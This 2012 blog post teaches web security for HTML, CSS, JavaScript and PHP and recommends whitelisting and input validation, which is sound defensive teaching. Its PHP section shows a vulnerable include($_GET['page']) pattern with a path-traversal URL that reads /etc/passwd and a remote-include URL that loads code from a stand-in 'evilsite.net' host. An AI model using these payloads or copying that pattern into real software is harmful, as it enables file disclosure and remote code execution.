Wednesday, March 14, 2012

HTML Security

Because you likely do not have much to do with your server, let’s focus on things you do have full control of.
HTML

HTML is pretty safe. The browser simply parses and displays it, with no calculations and no interaction with the server, so not much can go wrong. That said, you should always use HTML for what it’s for:

    * HTML structures your content.
      HTML is not a database to store information, because you cannot rely on HTML content to stay unchanged. Anyone can use browser debugging tools to change your HTML and its content. So JavaScript solutions that rely on data in the HTML, and don’t check with the server what that data is allowed to be, run into security issues.
    * HTML is fully visible.
      Don’t use comments in the HTML to store sensitive information, and don’t comment out sections of a page that are not ready yet but that point to parts of an application that are in progress.
    * Hiding things doesn’t make them go away.
      Even if you hide information with CSS or JavaScript, some people can get it anyway. HTML is not there to give your application functionality; that should always happen on the server.

A wonderful example of insecure HTML was the drop-down menu on the website of a certain airline. This menu let you define the seating class you wanted to fly in as the last step before printing your voucher. The website rendered the HTML of the drop-down menu and commented out the sections that were not available for the price you had selected:
    <select name="class">
      <option value="ec">Economy</option>
      <option value="ecp">Economy Plus</option>
      <!--
      <option value="bu">Business</option>
      <option value="fi">First</option>
      -->
    </select>

The server-side code did not check to see whether you were eligible for a first-class ticket; it simply relied on the option not being available. The form was then sent via JavaScript. So, all you had to do to get a first-class ticket for the price of an economy seat was use Firebug to add a new option to the form, select the value you wanted and send it off.
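
The missing server-side check could look roughly like the following. This is only a sketch, assuming PHP 7 or later: the fare names, the fare table and both function names are hypothetical, and only the option values (ec, ecp, bu, fi) come from the form above.

```php
<?php
// Hypothetical fare table: which seating classes each paid fare may book.
function allowed_classes_for($paidFare): array
{
    $fareTable = [
        'economy'  => ['ec', 'ecp'],
        'business' => ['ec', 'ecp', 'bu'],
        'first'    => ['ec', 'ecp', 'bu', 'fi'],
    ];
    // Unknown or malformed fares are allowed nothing at all.
    if (!is_string($paidFare) || !isset($fareTable[$paidFare])) {
        return [];
    }
    return $fareTable[$paidFare];
}

// True only if the submitted class is permitted for the fare on record.
function is_class_allowed($paidFare, $submittedClass): bool
{
    return is_string($submittedClass)
        && in_array($submittedClass, allowed_classes_for($paidFare), true);
}
```

In a form handler, the fare would come from state the server keeps itself (the session or the booking record), never from the form, for example is_class_allowed($_SESSION['fare'], $_POST['class']).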
CSS

CSS is not really capable of doing much to the document and cannot access the server… for now. One problem with CSS is background images that point to URIs. If an attacker manages to override these, they can inject code. The same applies to the @import rule for other style sheets.

Using expression() in Internet Explorer to make calculations (or, as in most cases, to simulate what other browsers can already do) is dangerous, though, because what you are doing in essence is executing JavaScript inside a CSS block. So, don’t use it.

CSS is changing a lot now, and we are giving it more power than ever before. Generating content with CSS, animation, calculations and font embedding all sound absolutely cool, but I get a prickly feeling in the back of my neck when I look at it right now.

Attack vectors have two features: they have the power to change the content of a document, and they are technologies that are not proven and are changing constantly. This is what CSS 3 is right now. Font-embedding in particular could become a big security issue, because fonts are binary data that could contain anything: harmless characters as well as viruses masquerading as a nice charset. It will be interesting to see how this develops.
JavaScript

JavaScript makes the Web what it is today. You can use it to build interfaces that are fun to use and that allow visitors to reach their goals fast and conveniently. You can and should use JavaScript for the following:

    * Create slicker interfaces (e.g. auto-complete, asynchronous uploading).
    * Warn users about flawed entries (password strength, for instance).
    * Extend the interface options of HTML to become an application language (sliders, maps, combo boxes, etc.)
    * Create visual effects that cannot be done safely with CSS (animation, menus, etc.)

JavaScript is very powerful, though, which also means that it is a security issue:

    * JavaScript gives you full access to the document and allows you to post data to the Internet.
    * You can read cookies and send them elsewhere.
    * JavaScript is also fully readable by anyone using a browser.
    * Any JavaScript on the page has the same rights as the others, regardless of where it came from. If you can inject a script via XSS, it can do and access whatever the other scripts can.

This means you should not try to do any of the following in JavaScript:

    * Store sensitive information (e.g. credit card numbers, any real user data).
    * Store cookies containing session data.
    * Try to protect content (e.g. right-click scripts, email obfuscation).
    * Replace your server or save on server traffic without a fallback.
    * Rely on JavaScript as the only means of validation. Attackers can turn off JavaScript and get full access to your system.
    * Trust any JavaScript that does not come from your server or a similar trusted source.
    * Trust anything that comes from the URI, HTML or form fields. All of these can be manipulated by attackers after the page has loaded. If you use document.write() on unfiltered data, you expose yourself to XSS attacks.

In other words, AJAX is fun, but do not rely on its security. Whatever you do in JavaScript can be monitored and logged by an end user with the right tools.
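
As a sketch of what repeating a client-side check on the server can look like, here is a PHP counterpart to a JavaScript password-strength warning. The rule itself (at least eight characters, containing a letter and a digit) and the function name are assumptions made for illustration; the point is only that the server applies the rule again.

```php
<?php
// Assumed rule for illustration: 8+ characters with a letter and a digit.
// The browser may already have warned the user; the server checks anyway,
// because the request may not have come from your page at all.
function is_acceptable_password($password): bool
{
    if (!is_string($password) || strlen($password) < 8) {
        return false;
    }
    return preg_match('/[A-Za-z]/', $password) === 1
        && preg_match('/[0-9]/', $password) === 1;
}
```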
PHP (or Any Server-Side Language)

Here be dragons! The server-side language is where you can really mess up if you don’t know what you’re doing. The biggest problems are trusting information from the URI or user entry and printing it out in the page. As shown earlier in the XSS example with the colors, you will be making it easy to inject malicious code into your page.

There are two ways to deal with this: whitelisting and proper filtering.

Whitelisting is the most effective way to make sure nothing insecure gets written out. The trick is easy: don’t use information that gets sent through as the output; rather, just use it in conditions or as lookups.

Let’s say you want to add a file on demand to a page. You currently have these sections on the page: About Us, Contact, Clients, Portfolio, Home, Partners. You could store the data of these in about-us.php, contact.php, clients.php, portfolio.php, index.php and partners.php.

The amazingly bad way to do this is probably the way you see done in many tutorials: a file called something like template.php, which takes a page parameter with the file name.

The template then normally contains something like this:
    <?php include($_GET['page']);?>

If you call http://example.com/template.php?page=about-us.php, this would load the “About Us” document and include it in the template where the code is located.

It would also allow someone to check out all of the other interesting things on your server. For example, http://example.com/template.php?page=../../../../../../../../etc/passwd or the like would allow an attacker to read your passwd file.

If your server allows for remote files with include(), you could also inject a file from another server, like http://example.com/template.php?page=http://evilsite.net/exploitcode/2.txt?. Remember, these text files will be executed as PHP inside your other PHP file and thus have access to everything. A lot of them contain mass-mailers or check your system for free space and upload options to store data.

In short: never, ever allow an unfiltered URI parameter to become part of a URI that you load in PHP or print out as an href or src in the HTML. Instead, use pointers:
    <?php
    $sites = array(
      'about'=>'about-us.php',
      'contact'=>'contact.php',
      'clients'=>'clients.php',
      'portfolio'=>'portfolio.php',
      'home'=>'index.php',
      'partners'=>'partners.php'
    );
    if( isset($_GET['page']) &&
        isset($sites[$_GET['page']]) &&
        file_exists($sites[$_GET['page']]) ){
          include($sites[$_GET['page']]);
    } else {
      echo 'This page does not exist on this system.';
    }
    ?>

This way, the parameter is not a file name but a keyword. So, http://example.com/template.php?page=about would include about-us.php, http://example.com/template.php?page=home would include index.php and so on. All other requests would trigger the error message. Note that the error message is in our control and does not come from the server; otherwise, you might display information that could be used for an exploit.

Also, notice how defensive the script is. It checks if a page parameter has been sent; then it checks if an entry for this value exists in the sites array; then it checks if the file exists; and then, and only then, it includes it. Good code does that… which also means it can be a bit bigger than expected. That’s not exactly “Build your own PHP templating system in 20 lines of code!” But it’s much better for the Web as a whole.
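
The same chain of checks can be wrapped in a small function, which makes it easier to test. This is a sketch assuming PHP 7.1 or later; the function name resolve_page() and the $baseDir parameter are hypothetical and not part of the script above. It also rejects values that are not strings, such as ?page[]=about.

```php
<?php
// Maps a requested keyword to a file path, or returns null if any check fails.
function resolve_page($requested, array $sites, string $baseDir): ?string
{
    // 1. A parameter was sent, and it is a plain string (not an array).
    if (!is_string($requested)) {
        return null;
    }
    // 2. The keyword is one of the entries we defined ourselves.
    if (!isset($sites[$requested])) {
        return null;
    }
    // 3. The file we mapped it to actually exists.
    $path = $baseDir . '/' . $sites[$requested];
    return is_file($path) ? $path : null;
}
```

A template could then call resolve_page($_GET['page'] ?? null, $sites, __DIR__) and include the result only if it is not null, printing its own error message otherwise.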

Generally, defining all of the variables you will use before you use them is a good idea. This makes it safer even in PHP set-ups that have register_globals enabled. The following cannot be cracked by calling the script with an authenticated parameter:
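    $authenticated = false;
    // isset() avoids notices when the form fields are missing;
    // === compares without type juggling
    if(isset($_POST['username'], $_POST['password']) &&
       $_POST['username'] === 'muppet' &&
       $_POST['password'] === 'password1') {
        $authenticated = true;
    }
    if($authenticated) {
      // do something only admins are allowed to do
    }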

The demo we showed earlier makes it possible to work around this, because $authenticated was not pre-set anywhere.
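
To see why the pre-set matters, the effect of registered globals can be imitated with extract(), which turns every request parameter into a variable of the same name. The two function names below are hypothetical, and this is a sketch of the principle rather than the earlier demo itself. (register_globals was removed in PHP 5.4, but the habit of initializing variables is still worth keeping.)

```php
<?php
// Without a pre-set, a request parameter can create $authenticated.
function check_without_preset(array $request): bool
{
    extract($request); // imitates register_globals
    if (isset($username, $password) &&
        $username === 'muppet' && $password === 'password1') {
        $authenticated = true;
    }
    return !empty($authenticated);
}

// With a pre-set, whatever the request injected is overwritten first.
function check_with_preset(array $request): bool
{
    extract($request); // imitates register_globals
    $authenticated = false;
    if (isset($username, $password) &&
        $username === 'muppet' && $password === 'password1') {
        $authenticated = true;
    }
    return $authenticated;
}
```

Calling check_without_preset(['authenticated' => '1']) lets the visitor in without a password, whereas check_with_preset() with the same input does not.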

Writing your own validator function is another option. For example, the color demo could be made secure by allowing only single words and numbers for the colors.
    $color = 'white';
    $background = 'black';
    if(isset($_GET['color']) && isvalid($_GET['color'])){
      $color = $_GET['color'];
      if(ishexcolor($color)){
        $color = '#'.$color;
      }
    }
    if(isset($_GET['background']) && isvalid($_GET['background'])){
      $background = $_GET['background'];
      if(ishexcolor($background)){
        $background = '#'.$background;
      }
    }
    function isvalid($col){
      // only allow strings that consist of a to z or 0 to 9
      return is_string($col) && preg_match('/^[a-z0-9]+$/',$col) === 1;
    }
    function ishexcolor($col){
      // checks if the string is 3 or 6 characters
      if(strlen($col)==3 || strlen($col)==6){
        // checks if the string only contains a to f or 0 to 9
        return preg_match('/^[a-f0-9]+$/',$col) === 1;
      }
      return false;
    }

This allows for http://example.com/test.php?color=red&background=pink or http://example.com/test.php?color=369&background=69c or http://example.com/test.php?color=fc6&background=449933, but not for http://example.com/test.php?color=333&background=</style>. This keeps it flexible for the end user but still safe to use.
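
The two checks can also be folded into one helper that always returns something safe to print. This is a sketch assuming PHP 7 or later; safe_color() is a hypothetical name. It uses \A and \z as anchors because $ in a PHP regular expression also matches just before a trailing newline.

```php
<?php
// Returns a value that is safe to print into a style sheet:
// a plain word, a hex color with '#' added, or the given default.
function safe_color($input, string $default): string
{
    // Anything that is not a lowercase word or number falls back to the default.
    if (!is_string($input) || preg_match('/\A[a-z0-9]+\z/', $input) !== 1) {
        return $default;
    }
    // Three or six hex digits are treated as a hex color.
    if (preg_match('/\A(?:[a-f0-9]{3}|[a-f0-9]{6})\z/', $input) === 1) {
        return '#' . $input;
    }
    return $input;
}
```

With this, the top of the script shrinks to $color = safe_color($_GET['color'] ?? null, 'white'); and the equivalent line for the background.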

If you are dealing with content that cannot be easily whitelisted, then you’ll need to filter out all the malicious code that someone could inject. This is quite the rat-race because new browser quirks are being found all the time that allow an attacker to execute code.

The most basic way to deal with this is to use the native PHP filters on anything that comes in. A quite sophisticated package called HTML Purifier is also available.
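
As a rough sketch of the native filters, assuming PHP 7.1 or later: filter_var() and the FILTER_* constants are part of PHP's filter extension, while the form fields (age, email, comment), the age range and the function name are made up for this example.

```php
<?php
// Validates and sanitizes a hypothetical comment form.
// Returns the cleaned values, or null if any field fails.
function clean_comment_form(array $input): ?array
{
    // Validation filters return false when the value does not fit.
    $age = filter_var($input['age'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 150],
    ]);
    $email = filter_var($input['email'] ?? null, FILTER_VALIDATE_EMAIL);

    // Sanitizing filters rewrite the value; this one encodes HTML
    // special characters so the text can be printed into a page.
    $comment = filter_var($input['comment'] ?? '', FILTER_SANITIZE_FULL_SPECIAL_CHARS);

    if ($age === false || $email === false || $comment === false) {
        return null;
    }
    return ['age' => $age, 'email' => $email, 'comment' => $comment];
}
```

Validation rejects bad input outright, while sanitizing changes it, so the sanitized comment here is only suitable for printing into HTML and not, say, for use in a database query.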